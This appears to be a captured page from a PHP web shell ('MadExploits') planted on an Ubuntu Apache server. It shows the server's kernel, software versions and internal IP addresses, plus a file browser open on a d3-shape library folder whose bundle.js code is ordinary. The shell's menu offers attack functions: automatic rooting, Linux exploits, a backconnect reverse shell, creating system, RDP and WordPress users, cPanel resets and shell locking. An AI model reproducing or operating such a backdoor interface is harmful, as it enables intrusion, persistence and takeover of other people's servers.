Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
d3-shape /
src /
curve /
[ HOME SHELL ]
Name
Size
Permission
Action
basis.js
1.41
KB
-rw-r--r--
basisClosed.js
1.5
KB
-rw-r--r--
basisOpen.js
1.05
KB
-rw-r--r--
bump.js
1.71
KB
-rw-r--r--
bundle.js
1.06
KB
-rw-r--r--
cardinal.js
1.6
KB
-rw-r--r--
cardinalClosed.js
1.57
KB
-rw-r--r--
cardinalOpen.js
1.27
KB
-rw-r--r--
catmullRom.js
2.59
KB
-rw-r--r--
catmullRomClosed.js
2.04
KB
-rw-r--r--
catmullRomOpen.js
1.73
KB
-rw-r--r--
linear.js
744
B
-rw-r--r--
linearClosed.js
517
B
-rw-r--r--
monotone.js
3.13
KB
-rw-r--r--
natural.js
1.72
KB
-rw-r--r--
radial.js
658
B
-rw-r--r--
step.js
1.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bundle.js
import {Basis} from "./basis.js"; function Bundle(context, beta) { this._basis = new Basis(context); this._beta = beta; } Bundle.prototype = { lineStart: function() { this._x = []; this._y = []; this._basis.lineStart(); }, lineEnd: function() { var x = this._x, y = this._y, j = x.length - 1; if (j > 0) { var x0 = x[0], y0 = y[0], dx = x[j] - x0, dy = y[j] - y0, i = -1, t; while (++i <= j) { t = i / j; this._basis.point( this._beta * x[i] + (1 - this._beta) * (x0 + t * dx), this._beta * y[i] + (1 - this._beta) * (y0 + t * dy) ); } } this._x = this._y = null; this._basis.lineEnd(); }, point: function(x, y) { this._x.push(+x); this._y.push(+y); } }; export default (function custom(beta) { function bundle(context) { return beta === 1 ? new Basis(context) : new Bundle(context, beta); } bundle.beta = function(beta) { return custom(+beta); }; return bundle; })(0.85);
Close